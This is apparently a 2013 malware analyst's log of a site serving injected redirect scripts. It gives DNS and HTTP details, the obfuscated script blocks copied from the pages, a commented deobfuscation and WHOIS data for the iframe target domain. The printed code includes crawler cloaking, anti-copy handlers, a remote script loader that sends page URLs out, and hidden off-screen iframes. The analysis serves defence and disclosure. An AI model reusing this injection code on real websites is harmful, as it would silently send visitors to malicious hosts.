- #MalwareMustDie! @unixfreaxjp /malware]$ date
- Sat Mar 2 02:09:41 JST 2013
- // Also beware of movieshuttle.net / 50.87.40.75
- // Same as oklahomanews-online.com: a malicious TDS (traffic distribution system).
- movieshuttle.net A 50.87.40.75
- movieshuttle.net NS ns1.rhostjh.com
- movieshuttle.net NS ns2.rhostjh.com
- h00p://movieshuttle.net/american-reunion-2012.html
- or
- h00p://movieshuttle.net/american-reunion-2012.html
- h00p://movieshuttle.net/yohan-barnevandrer-2010.html
- h00p://movieshuttle.net/tag/1937
- h00p://movieshuttle.net/hoodwinked-too-hood-vs-evil-2011.html
- h00p://movieshuttle.net/flame-and-citron-2008.html
- // Headers...
- --2013-03-02 01:58:43-- h00p://movieshuttle.net/beautiful-boy-2010.html
- Resolving movieshuttle.net... seconds 0.00, 50.87.40.75
- Caching movieshuttle.net => 50.87.40.75
- Connecting to movieshuttle.net|50.87.40.75|:80... seconds 0.00, connected.
- :
- h00p/1.1 200 OK
- Date: Fri, 01 Mar 2013 16:58:27 GMT
- Server: Apache
- X-CF-Powered-By: WP 1.3.9
- X-Pingback: h00p://movieshuttle.net/xmlrpc.php
- Link: <h00p://movieshuttle.net/?p=3263>; rel=shortlink
- Cache-Control: max-age=31104000
- Expires: Mon, 24 Feb 2014 16:58:27 GMT
- Vary: Accept-Encoding
- Connection: close
- Content-Type: text/html; charset=UTF-8
- 200 OK
- Length: unspecified [text/html]
- Saving to: `beautiful-boy-2010.html'
- 2013-03-02 01:58:46 (91.0 KB/s) - `beautiful-boy-2010.html' saved [108323]
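- // Found this script injected 2 times in every page.
- // Note: in the capture below the digit 0 shows up as the letter O (e.g. `Oxff`, `i=O`, "4O"), apparently from defanging or pasting, so do not build byte-exact signatures from this text.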
- :
- <script language="javascript" type="text/javascript">var lO1='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';var _Ox84de=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzO123456789+/=","","charAt","indexOf","fromCharCode","length"];function _O1O(data){var O1OlOI=_Ox84de[O];var o1,o2,o3,h1,h2,h3,h4,bits,i=O,enc=_Ox84de[1];do{h1=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));h2=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));h3=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));h4=O1OlOI[_Ox84de[3]](data[_Ox84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&Oxff;o2=bits>>8&Oxff;o3=bits&Oxff;if(h3==64){enc+=String[_Ox84de[4]](o1);} else {if(h4==64){enc+=String[_Ox84de[4]](o1,o2);} else {enc+=String[_Ox84de[4]](o1,o2,o3);} ;} ;} while(i<data[_Ox84de[5]]);;return enc;} ;function O1O(string){var ret=_Ox84de[1],i=O;for(i=string[_Ox84de[5]]-1;i>=O;i--){ret+=string[_Ox84de[2]](i);} ;return ret;} ;eval(_O1O(O1O(lO1)));</script><script>try{window.document.body/=2}catch(dgsgsdg){whwej=12;ww=window;}if(whwej){try{f=document.createElement("div");}catch(agdsg){whwej=O;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","3O","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","4O","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","16","4f","41","3m","4c","4O","29","1d","1n","1m","1m","1d","16","4O","3n","41","3p","4O","4c","29","1d","1n","1m","1m","
1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","4O","26","1n","1m","1m","48","4g","27","4O","3n","41","3p","4O","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","4O","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","4O","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","4O","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","4O","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4O","3n","41","3p","4O","4c","1d","1i","1d","1n","1m","1m","1d","
1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","3O","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","4O","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=O;i-63O!=O;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}</script>
- :
- // Deobfuscated (first script):
- var _escape = '
- %3Ciframe%20src%3D%22h00p%3A//googleclick.info/%3Ftravel%22%20width%3D5%20height%3D5%20frameborder%3D5%3E%3C/iframe%3E';
- if (window.navigator.userAgent.indexOf('Rambler') >= 0 || window.navigator.userAgent.indexOf('Yandex') >= 0 || window.navigator.userAgent.indexOf('Yaho') >= 0 || window.navigator.userAgent.indexOf('Googlebot') >= 0 || window.navigator.userAgent.indexOf('Turtle') >= 0){ // cloaking: branch taken when the User-Agent contains one of these crawler names
- Break(); // Break is not defined anywhere in this listing; presumably the resulting error stops the script so crawlers never see the injection (confirm)
- }
- ;
- document.onselectstart = function (){ // this handler and the ones below return false to cancel the event: selection, mouse-down, context menu, drag
- return false;
- }
- ;
- document.onmousedown = function (){
- return false;
- }
- ;
- document.oncontextmenu = function (){ // cancels the right-click menu
- return false;
- }
- ;
- document.onkeydown = function (e){ // keyboard filter, applied only while Ctrl is held
- e = e || window.event; // fall back to window.event when no event argument is passed
- if (e.ctrlKey){
- if ((e.keyCode == '85') || (e.keyCode == '67') || (e.keyCode == '65') || (e.keyCode == '45'))return false; // key codes 85/67/65/45 = U, C, A, Insert; loose == lets the numeric keyCode match the strings
- }
- }
- ;
- document.onkeypress = function (e){ // same Ctrl filter as onkeydown, registered for keypress as well
- e = e || window.event;
- if (e.ctrlKey){
- if ((e.keyCode == '85') || (e.keyCode == '67') || (e.keyCode == '65') || (e.keyCode == '45'))return false;
- }
- }
- ;
- document.ondragstart = function (){ // cancels drag; taken together these handlers appear intended to hinder viewing or copying the page source
- return false;
- }
- ;
- function atlpdp1(){ // hides every element that is not already hidden and marks it with id 'atlpdpst'
- for (wi = 0; wi < document.all.length; wi ++ ){ // wi is assigned without var, so it is an implicit global
- if (document.all[wi].style.visibility != 'hidden'){
- document.all[wi].style.visibility = 'hidden';
- document.all[wi].id = 'atlpdpst' // overwrites whatever id the element had before
- }
- }
- }
- function atlpdp2(){ // clears the visibility style on every element whose id is 'atlpdpst'
- for (wi = 0; wi < document.all.length; wi ++ ){
- if (document.all[wi].id == 'atlpdpst')document.all[wi].style.visibility = ''
- }
- }
- window.onbeforeprint = atlpdp1; // page content is hidden while printing
- window.onafterprint = atlpdp2; // and shown again once printing is done
- var _0OO = document.createElement('script'); // new <script> element whose source is a third-party host
- _0OO.src = 'h00p://api.myobfuscate.com/?getsrc=ok' + '&ref=' + encodeURIComponent(document.referrer) + '&url=' + encodeURIComponent(document.URL); // request carries the referrer and the current page URL as query parameters
- var OIl = document.getElementsByTagName('head')[0];
- OIl.appendChild(_0OO); // appending to <head> makes the browser fetch and run whatever that host returns
- document.write(unescape(_escape)); // decodes the percent-encoded <iframe> held in _escape (googleclick.info/?travel, 5x5) and writes it into the page
- // The second script leads to the same IFRAMER:
- if (document.getElementsByTagName('body')[0]){ // <body> already exists: inject through the DOM
- iframer(); // declared further down; function declarations are hoisted
- }
- else { // no <body> yet: write equivalent hidden-iframe markup straight into the document
- document.write("
- <iframe src='h00p://googleclick.info/?travel' width='100' height='100' style='width:100px;
- height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
- }
- function iframer(){ // builds an iframe to googleclick.info/?travel and appends it to <body>
- var f = document.createElement('iframe');
- f.setAttribute('src', 'h00p://googleclick.info/?travel');
- f.style.left = '-10000px'; // placed far off-screen to the left
- f.style.visibility = 'hidden'; // and not rendered visibly; the off-screen hidden iframe is the indicator to look for in affected pages
- f.style.top = '0';
- f.style.position = 'absolute';
- f.style.top = '0'; // repeats the assignment made two lines above
- f.setAttribute('width', '100');
- f.setAttribute('height', '100');
- document.getElementsByTagName('body')[0].appendChild(f); // the iframe starts loading once attached
- }
- // Who is responsible for googleclick.info?
- Domain ID:D49081589-LRMS
- Domain Name:GOOGLECLICK.INFO
- Created On:01-Feb-2013 07:48:44 UTC
- Last Updated On:26-Feb-2013 05:48:36 UTC
- Expiration Date:01-Feb-2014 07:48:44 UTC
- Sponsoring Registrar:DomainContext Inc. (R524-LRMS)
- Status:CLIENT TRANSFER PROHIBITED
- Status:TRANSFER PROHIBITED
- Registrant ID:PP-SP-001
- Registrant Name:Domain Admin
- Registrant Organization:PrivacyProtect.org
- :
- Name Server:NS1D3.STATUSHOST.RU
- Name Server:NS2D3.STATUSHOST.RU
- // Just block this; it is an infector anyway.
- ----
- #MalwareMustDie!